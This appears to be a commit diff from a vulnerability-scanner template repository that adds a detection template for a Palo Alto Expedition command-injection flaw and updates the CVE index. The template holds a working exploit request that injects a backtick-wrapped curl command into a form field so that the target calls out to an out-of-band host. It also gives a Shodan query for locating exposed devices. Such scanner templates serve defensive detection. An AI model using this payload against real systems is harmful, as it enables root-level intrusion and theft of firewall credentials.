Merge branch 'main' into update-CVE-2024-9465

Author: ritikchaddha

.new-additions

@@ -26,6 +26,7 @@ http/cves/2024/CVE-2024-7714.yaml
 http/cves/2024/CVE-2024-7854.yaml
 http/cves/2024/CVE-2024-8021.yaml
 http/cves/2024/CVE-2024-8877.yaml
+http/cves/2024/CVE-2024-9463.yaml
 http/cves/2024/CVE-2024-9465.yaml
 http/default-logins/datagerry/datagerry-default-login.yaml
 http/default-logins/netdisco/netdisco-default-login.yaml

cves.json

@@ -2674,6 +2674,7 @@
 {"ID":"CVE-2024-8877","Info":{"Name":"Riello Netman 204 - SQL Injection","Severity":"critical","Description":"The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8877.yaml"}
 {"ID":"CVE-2024-8883","Info":{"Name":"Keycloak - Open Redirect","Severity":"medium","Description":"A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2024/CVE-2024-8883.yaml"}
 {"ID":"CVE-2024-9014","Info":{"Name":"pgAdmin 4 - Authentication Bypass","Severity":"critical","Description":"pgAdmin 4 versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-9014.yaml"}
+{"ID":"CVE-2024-9463","Info":{"Name":"PaloAlto Networks Expedition - Remote Code Execution","Severity":"critical","Description":"An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-9463.yaml"}
 {"ID":"CVE-2024-9465","Info":{"Name":"Palo Alto Expedition - SQL Injection","Severity":"medium","Description":"An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-9465.yaml"}
 {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
 {"ID":"CVE-2004-2687","Info":{"Name":"Distccd v1 - Remote Code Execution","Severity":"high","Description":"distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"network/cves/2004/CVE-2004-2687.yaml"}

cves.json-checksum.txt

@@ -1 +1 @@
-908cb06f6d5ef95a3bd764865f38785b
+dfbb91015830ffbfb93113bb530ae9bd

http/cves/2024/CVE-2024-9463.yaml

@@ -0,0 +1,54 @@
+id: CVE-2024-9463
+
+info:
+  name: PaloAlto Networks Expedition - Remote Code Execution
+  author: princechaddha
+  severity: critical
+  description: |
+    An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.
+  impact: |
+    Successful exploitation could result in unauthorized access and control of the affected device.
+  remediation: |
+    Apply the necessary security patches provided by Palo Alto Networks to mitigate the CVE-2024-9463 vulnerability.
+  reference: |
+    - https://x.com/watchtowrcyber/status/1844306954245767623
+    - https://security.paloaltonetworks.com/PAN-SA-2024-0010
+    - https://github.com/fkie-cad/nvd-json-data-feeds
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-9463
+  classification:
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/S
+    cvss-score: 9.9
+    cve-id: CVE-2024-9463
+    cwe-id: CWE-78
+    epss-score: 0.00043
+    epss-percentile: 0.10347
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: paloaltonetworks
+    product: expedition
+    shodan-query: http.favicon.hash:1499876150
+  tags: cve,cve2024,palo-alto,rce
+
+http:
+  - raw:
+      - |
+        POST /API/convertCSVtoParquet.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        ram=watchTowr`curl+{{interactsh-url}}`
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: body
+        words:
+          - "Undefined index: taskID"
+
+# digest: 4b0a00483046022100cdd2c4cae04ab311f7a3d9ee79a7201da03b5bd8b8d9312e58ce403dbd6cdbf4022100c4e7133d66ad41e54e953aee946e7497909231938942cdb905aa31afdea28e4e:922c64590222798bb761d5b6d8e72950

http/cves/2024/CVE-2024-9465.yaml

@@ -60,3 +60,5 @@ http:
           - 'duration>=6'
           - 'status_code == 200'
         condition: and
+
+# digest: 4b0a00483046022100905b5167207e7acc0dfa780c9c1d4b331df499f671267a4698fd994efcb3affa022100eec1110988072447630b0423feb2c23e97db4d8cf0d2e1ffa039e24cf05e488a:922c64590222798bb761d5b6d8e72950